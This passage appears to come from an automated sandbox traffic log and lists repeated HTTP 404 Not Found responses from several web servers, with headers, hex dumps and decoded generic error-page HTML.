Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6NUtOUuKUEdjC4PF9cY7rxleh7BXC2BiUjZHuGVKQWlYE7YHDbHujUaNiaPYvoZu4MN71YY%2Bf%2FZRwNcnZOrIlZOGYF%2FPfuf%2FrCGotJGU3hnh9OPDsr6PrlyY9fb4KKFZ0pR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90145151dc1fc9b0-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100429&min_rtt=100429&rtt_var=50214&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yIuPNt9L6TlLRkIoNruQbNKg4USH3hxDh7R2cEq1VgN2jJW0nv5vZL2O7GJ3Q7X9AF9kqU5wtxfd9jjgiInibav%2Bztq5Km6Pl%2BK4iMzJpj1ugMqT9%2FMFxdWnhmatbEP7%2B43v"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901451623db80634-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100388&min_rtt=100388&rtt_var=50194&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5GNVlG%2B86omIiWY1E%2BqPDm%2B9MawDHBf2LZTn1oGCjPXZo6zFHDj3GDAXRAC0H9xyylPIn0v0EZuqSoxP79hF9sND1FzMDFNbcCa3lmfF3cwHP6HY5AeOx9KabCLwnPWYcEd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901451729efe0634-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100159&min_rtt=100159&rtt_var=50079&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:53 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:56 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:21:59 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:22:01 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:22:16 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:22:19 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:22:22 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 